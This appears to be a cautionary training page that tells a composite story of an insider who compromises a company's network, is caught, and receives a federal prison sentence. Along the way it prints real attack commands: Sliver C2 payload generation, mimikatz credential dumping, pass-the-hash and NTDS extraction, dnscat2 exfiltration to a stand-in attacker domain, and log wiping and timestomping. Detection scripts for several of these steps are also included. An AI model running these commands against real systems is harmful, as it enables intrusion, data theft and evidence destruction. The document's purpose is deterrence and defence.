From Idea to Incarceration

The Complete Attack Lifecycle: A Cautionary Tale

This Is How It Ends

Every hacker thinks they're different. Smarter. More careful. They all end up the same way. This is the complete story of an attack - from the first spark of an idea to the cold reality of a federal prison cell. This is not fiction. This is a composite of real cases, real mistakes, and real consequences.

The Complete Lifecycle
    THE IDEA          "I could totally hack them..."
         ↓
    RECON             Research, OSINT, target selection
         ↓
    WEAPONIZE         Infrastructure, payloads, C2
         ↓
    DELIVER           Phishing, initial access
         ↓
    EXPLOIT           Code execution, privesc
         ↓
    PERSIST           Survive reboots, maintain access
         ↓
    C2                Lateral movement, credential theft
         ↓
    ACTIONS           Exfiltration, ransomware, destruction
         ↓
    COVER TRACKS      Log deletion, timestomping
         ↓
    GET CAUGHT        One mistake is all it takes
         ↓
    INVESTIGATION     FBI, forensics, grand jury
         ↓
    ARREST            6 AM raid, handcuffs, perp walk
         ↓
    TRIAL             Plea deal or jury conviction
         ↓
    PRISON            Federal time, no parole
         ↓
    AFTER             Felon for life, career destroyed
                    

Act I: The Seed

Genesis
Day 0 - The Idea
It Always Starts Small

Marcus worked IT at a mid-size company. Good at his job. Underpaid. Passed over for promotion three times. Then he found a vulnerability in a competitor's website during a late-night curiosity session.

"I'm not going to do anything. I'm just... looking. It's not illegal to look. Besides, their security is pathetic. Someone should tell them."

He didn't tell them. He bookmarked it instead. Told himself he'd report it later. The bookmark sat there for two weeks. Then curiosity turned into planning.

Recon
Week 1-4 - Target Research
Reconnaissance Phase

Marcus started researching. LinkedIn profiles of their IT staff. Company org charts. Job postings revealed their tech stack. DNS records showed their infrastructure. He built a complete picture without touching their systems.

    $ theHarvester -d targetcorp.com -b all
    $ subfinder -d targetcorp.com
    $ shodan search "targetcorp"

"This isn't hacking. It's just... research. All public information. Anyone could do this. I'm learning. That's allowed."

Reality check: He was building a target package. Every piece of information would later be used as evidence of premeditation.

Act II: The Build

Weaponize
Week 5-8 - Infrastructure Setup
Building the Arsenal

Marcus bought a VPS with Bitcoin. Set up a C2 server. Used Tor for everything. He felt invisible. Untraceable.

    # "Anonymous" VPS purchase
    $ ssh root@185.xxx.xxx.xxx
    # Sliver C2 installation
    $ ./sliver-server
    # Payload generation
    sliver > generate --mtls 185.xxx.xxx.xxx --os windows

"Bitcoin is anonymous. Tor is untraceable. I'm using a VPS in Moldova. There's no way this comes back to me. I've read all the guides."

What he didn't know: The Bitcoin exchange he used required KYC verification two years ago. His ID was on file. The VPS provider kept logs despite their "no logs" policy. Tor exit nodes were monitored. Every "anonymous" layer had a hole.

Payload
Week 9-10 - Crafting the Attack
Payload Development

He built a phishing email. Spoofed the CEO's address. Attached a macro-enabled document that would download his implant. Tested it against his own machine. It worked perfectly.

    From: ceo@targetcorp.com (spoofed)
    Subject: Q4 Budget Review - URGENT ACTION REQUIRED
    Attachment: Q4_Budget_Review_CONFIDENTIAL.xlsm

"It's so easy. Their email doesn't even have DMARC properly configured. They're basically asking for this."

Act III: The Attack

Deliver
Week 11, Monday 9:47 AM - Initial Access
The Phish That Landed

Sent to 15 employees. Sarah in accounting opened it. Enabled macros because the document said to. Marcus watched his C2 console light up with a new beacon.

    [*] Session 1 opened - TARGETCORP\sarah.jones @ ACCT-WS-047
    [*] Beacon checking in every 60 seconds

"Holy shit. It worked. I'm in. I'm actually in. This is real. What do I do now?"

His hands were shaking. He should have stopped here. He didn't.

Exploit
Week 11, Monday-Wednesday - Privilege Escalation
Going Deeper

Sarah's workstation was just the beginning. Marcus ran local privesc exploits. Got SYSTEM. Dumped credentials from memory. Found a domain admin logged in.

    sliver > getsystem
    [*] Got SYSTEM!
    sliver > mimikatz
    Username: admin.thompson
    NTLM: aad3b435b51404eeaad3b435b51404ee

First evidence trail: Every command was logged by the endpoint detection software. It wasn't blocking, just alerting. Security was already investigating.

Lateral
Week 11-12 - Network Spread
Lateral Movement

Using the stolen domain admin hash, Marcus moved laterally. File servers. Database servers. The domain controller itself. He owned everything.

    # Pass-the-hash to DC
    $ psexec.py -hashes :aad3b435b51404ee admin.thompson@DC01
    # Full domain compromise
    C:\> ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

"Domain admin. I have everything. Their entire Active Directory. Every password. Every secret. I'm a god in their network."

Actions
Week 12-13 - The Heist
Exfiltration

Customer database. 2.3 million records. Financial documents. R&D plans. Trade secrets. Marcus compressed it all, encrypted it, and exfiltrated it over DNS tunneling.

    # Data staging
    $ tar czf data.tar.gz /mnt/shares/customers/ /mnt/shares/finance/
    # DNS exfiltration
    $ dnscat2 --dns domain=exfil.marcus-c2.com --secret=hunter2
    [+] Sending 4.7GB over 847,293 DNS queries...

Second evidence trail: 847,293 DNS queries to a single domain over 48 hours. Their SIEM flagged it immediately. Incident response was already engaged.
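One way the SIEM rule described above can be approximated, as an added example that is not part of the original material: it groups constructed DNS resolver log lines by registered domain and flags any domain that draws many queries whose leftmost labels are high-entropy and mostly TXT, the shape a dnscat2-style tunnel leaves in resolver logs. The log format, the thresholds and the hex labels are assumptions; only the domain exfil.marcus-c2.com comes from the story.

```python
import math
from collections import defaultdict
# Constructed resolver log, one query per line: "<epoch> <client> <qname> <qtype>".
# exfil.marcus-c2.com is the story's domain; the hex labels are made up.
SAMPLE_LOG = """\
1700000000 10.0.5.47 www.targetcorp.com A
1700000001 10.0.5.47 mail.targetcorp.com A
1700000002 10.0.5.47 3f9a1c7e2b8d4e0f.exfil.marcus-c2.com TXT
1700000003 10.0.5.47 a81b6d02e4f93c5a.exfil.marcus-c2.com TXT
1700000004 10.0.5.47 7c4d2e9f1a0b5e83.exfil.marcus-c2.com TXT
1700000005 10.0.5.47 e2f1a9b7c3d06584.exfil.marcus-c2.com TXT
1700000007 10.0.5.47 9b0e3c5d7f2a1846.exfil.marcus-c2.com TXT
"""

def registered_domain(qname):
    """Crude eTLD+1: the last two labels (enough for .com examples)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def shannon_entropy(label):
    """Bits per character; encoded data chunks score near 4, words near 2."""
    n = len(label)
    if n == 0:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def find_tunnel_candidates(log_text, min_queries=4, min_entropy=3.0, min_txt_ratio=0.5):
    """Group queries by registered domain; flag volume + entropy + TXT-heavy domains."""
    stats = defaultdict(lambda: {"queries": 0, "txt": 0, "entropy": 0.0})
    for line in log_text.splitlines():
        _, _, qname, qtype = line.split()
        dom = registered_domain(qname)
        sub = qname[:-len(dom) - 1] if len(qname) > len(dom) else ""
        s = stats[dom]
        s["queries"] += 1
        s["txt"] += qtype == "TXT"
        s["entropy"] += shannon_entropy(sub.split(".")[0])  # leftmost label only
    flagged = {}
    for dom, s in stats.items():
        avg_entropy = s["entropy"] / s["queries"]
        if (s["queries"] >= min_queries and avg_entropy >= min_entropy
                and s["txt"] / s["queries"] >= min_txt_ratio):
            flagged[dom] = {"queries": s["queries"], "avg_entropy": round(avg_entropy, 2)}
    return flagged

if __name__ == "__main__":
    print(find_tunnel_candidates(SAMPLE_LOG))
```

On real resolver logs the volume threshold would be set per hour per domain against a baseline, which is what turns 847,293 queries to one domain into an alert rather than noise.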

Act IV: The Cleanup (That Wasn't)

Cover Tracks
Week 13 - Anti-Forensics
Attempting to Hide

Marcus tried to cover his tracks. Deleted event logs. Cleared PowerShell history. Timestomped files. Removed his persistence mechanisms.

    # Clear Windows Event Logs
    wevtutil cl Security
    wevtutil cl System
    wevtutil cl Application
    # Timestomp implant
    timestomp.exe C:\Windows\Temp\svc.exe -m "01/15/2019 12:00:00"

"Clean. Everything's clean. No logs, no evidence. It's like I was never there."

What he missed:

  • Clearing the event log itself generates Event ID 1102, which was forwarded to the SIEM
  • $MFT timestamps weren't touched - forensics would find the discrepancy
  • Firewall logs were on a separate system he never accessed
  • Their cloud backup had snapshots from before he started deleting
  • DNS query logs were at their ISP, not on-premise
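The first two items in the list above can be turned into detection logic; the following is an added example, not part of the original material. It scans constructed forwarded Windows events for the log-clear event IDs (1102 for the Security log, 104 for System and Application) and checks constructed $MFT-style records for a $STANDARD_INFORMATION modified time earlier than the $FILE_NAME creation time, the inconsistency left by tools that only rewrite $SI. Field names and timestamps are assumptions; host, user and file path follow the story.

```python
from datetime import datetime

# Constructed forwarded Windows events, shaped like what a SIEM receives from
# a log forwarder. Host and user names follow the story; times are made up.
SAMPLE_EVENTS = [
    {"host": "ACCT-WS-047", "channel": "Security", "event_id": 4688,
     "user": "TARGETCORP\\sarah.jones", "time": "2024-03-18T09:47:12"},
    {"host": "ACCT-WS-047", "channel": "Security", "event_id": 1102,
     "user": "TARGETCORP\\admin.thompson", "time": "2024-03-26T23:14:05"},
    {"host": "ACCT-WS-047", "channel": "System", "event_id": 104,
     "user": "TARGETCORP\\admin.thompson", "time": "2024-03-26T23:14:07"},
    {"host": "DC01", "channel": "Security", "event_id": 4624,
     "user": "TARGETCORP\\admin.thompson", "time": "2024-03-26T23:15:00"},
]

# 1102 = "The audit log was cleared" (Security); 104 = System/Application log
# cleared. Both are written *after* the log is emptied, so a forwarder ships
# them even though the entries that preceded them are gone.
LOG_CLEAR_IDS = {1102, 104}

def find_log_clears(events):
    """Return (host, channel, user, time) for every log-clear event seen."""
    return [(e["host"], e["channel"], e["user"], e["time"])
            for e in events if e["event_id"] in LOG_CLEAR_IDS]

# Constructed $MFT-style records. Timestomping tools typically rewrite the
# $STANDARD_INFORMATION ($SI) timestamps but leave $FILE_NAME ($FN) alone.
SAMPLE_MFT = [
    {"path": r"C:\Windows\Temp\svc.exe",
     "si_modified": "2019-01-15T12:00:00", "fn_created": "2024-03-18T09:48:30"},
    {"path": r"C:\Windows\notepad.exe",
     "si_modified": "2023-11-02T08:00:00", "fn_created": "2023-11-02T08:00:00"},
]

def find_timestomp_candidates(records):
    """Flag paths whose $SI modified time predates $FN creation: a file cannot
    be modified before it existed, so one of the two timestamps was rewritten."""
    hits = []
    for r in records:
        si = datetime.fromisoformat(r["si_modified"])
        fn = datetime.fromisoformat(r["fn_created"])
        if si < fn:
            hits.append(r["path"])
    return hits

if __name__ == "__main__":
    for clear in find_log_clears(SAMPLE_EVENTS):
        print("LOG CLEARED:", clear)
    for path in find_timestomp_candidates(SAMPLE_MFT):
        print("TIMESTOMP CANDIDATE:", path)
```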

Act V: The Unraveling

Detected
Week 14 - The Call
Incident Response Begins

TargetCorp's managed security provider had been watching the whole time. When they saw event logs being cleared, they knew it was serious. They called in a major IR firm. Forensic images were captured. The FBI was notified.

What Marcus Didn't Know

A full incident response team was analyzing his every move while he thought he was "cleaning up." By the time he finished deleting logs, they had complete forensic images with everything preserved.

Traced
Week 15-20 - Attribution
Following the Breadcrumbs

The FBI Cyber Division took the case. They started pulling threads.

  • VPS Provider: Responded to legal request with payment records pointing to Bitcoin exchange
  • Bitcoin Exchange: Provided KYC documents - Marcus's driver's license
  • ISP Logs: Showed Tor connections from Marcus's home IP during attack windows
  • Employer Records: Confirmed Marcus had IT skills and motive (passed over for promotion)
  • Writing Analysis: Phishing email writing style matched Marcus's work emails

"Why is my boss acting weird? Why did HR ask for my badge yesterday? Probably nothing. Just paranoia."

Warrant
Week 22 - Grand Jury
The Indictment

A federal grand jury returned a sealed indictment:

  • 18 U.S.C. § 1030(a)(2): Unauthorized access to protected computer (5 years)
  • 18 U.S.C. § 1030(a)(5): Intentional damage to protected computer (10 years)
  • 18 U.S.C. § 1028A: Aggravated identity theft (mandatory 2 years consecutive)
  • 18 U.S.C. § 1343: Wire fraud (20 years)
  • 18 U.S.C. § 1832: Theft of trade secrets (10 years)

Maximum exposure: 47 years federal prison

Act VI: The Fall

Arrest
Week 24, Tuesday 6:03 AM
The Raid

Marcus was asleep when the FBI knocked. Actually, they didn't knock - they used a battering ram. Eight agents. Guns drawn. His wife screaming. Kids crying. Neighbors watching from windows.

┌─────────────────────────────┐
│                             │
│         [PHOTO]             │
│                             │
│   FBI CYBER DIVISION        │
│   CASE: 2024-CF-03847       │
│                             │
│   MARCUS [REDACTED]         │
│   DOB: [REDACTED]           │
│   ARREST: 6:03 AM           │
│                             │
└─────────────────────────────┘
                            
Federal Booking Photo

They took everything. Every computer. Every phone. Every USB drive. External hard drives he forgot existed. His kids' tablets (might have been used). His wife's laptop. The router. Smart home devices. Everything.

"This isn't happening. This can't be happening. I was careful. I used Tor. I used Bitcoin. How did they find me?"

Legal
Months 1-8 - Legal Process
The System Grinds

Initial appearance. Bail hearing. Denied bail (flight risk, technical sophistication). Preliminary hearing. Arraignment. Discovery (thousands of pages of evidence against him). Motion hearings. Suppression motions denied. Trial date set.

The Evidence Against Him

  • 47 terabytes of forensic images
  • Complete C2 server logs (VPS provider cooperated)
  • Bitcoin transaction chain to his verified identity
  • Timing correlation between Tor usage and attack commands
  • Writing analysis matching his known communications
  • Motive established through employment records
  • Stolen data found on his encrypted drive (password was in browser)

His attorney recommended a plea deal. Trial would mean maximum sentencing guidelines. Prosecutors offered 12 years in exchange for a guilty plea.

Sentence
Month 10 - Sentencing Hearing
The Judgment

Marcus took the deal. 12 years federal prison. There is no parole in the federal system, so he'll serve at least 85% of that sentence. Plus 3 years supervised release. $2.3 million in restitution. Lifetime ban from computers without permission from his probation officer.

    UNITED STATES v. MARCUS [REDACTED]
    CASE NO: 2024-CF-03847
    SENTENCE:
    - 144 months (12 years) Federal Bureau of Prisons
    - 36 months supervised release
    - $2,347,892.00 restitution
    - Special conditions: No computer access without PO approval
    FACILITY DESIGNATION: FCI [REDACTED]
    SURRENDER DATE: [REDACTED]

─── 10 YEARS LATER ───

Release
Year 10 - After Prison
The Aftermath

Marcus was released after serving 10 years (85% of his sentence with good behavior). He walked out at age 44. Here's what he found:

  • Marriage: Divorced. Wife couldn't handle the stigma and financial ruin.
  • Kids: His children were 8 and 6 when he went in. Now 18 and 16. They barely know him.
  • Career: Felon. Can't pass a background check. Can't work in IT, finance, healthcare, education, government, or any job requiring clearance.
  • Finances: Still owes $2.1 million in restitution. Wages garnished for life.
  • Technology: Needs permission from PO to use a smartphone. Random computer searches for 3 years.
  • Housing: Many apartments won't rent to felons. Living in a halfway house.

"I lost everything for $0. I never sold the data. Never made a cent. Just wanted to prove I could do it. Prove I was smart. Look where smart got me."

The Real Lesson

There Is No "Untraceable"

Every technique in this training material has a detection method. Every "anonymous" service has a weakness. Every "perfect" operation has a single mistake waiting to unravel it.

  • Bitcoin: Blockchain is permanent. One exchange with KYC = identity exposed.
  • Tor: Timing correlation, exit node monitoring, operational mistakes.
  • VPS "No Logs": They all keep logs when law enforcement asks nicely with a warrant.
  • Deleted Logs: Backups, SIEM forwarding, cloud snapshots, ISP records.
  • Encryption: Password in browser. Rubber hose cryptanalysis. Key escrow.

The FBI has unlimited time and resources. You have one chance to make zero mistakes. Those odds don't favor you.

What These Skills Are Actually For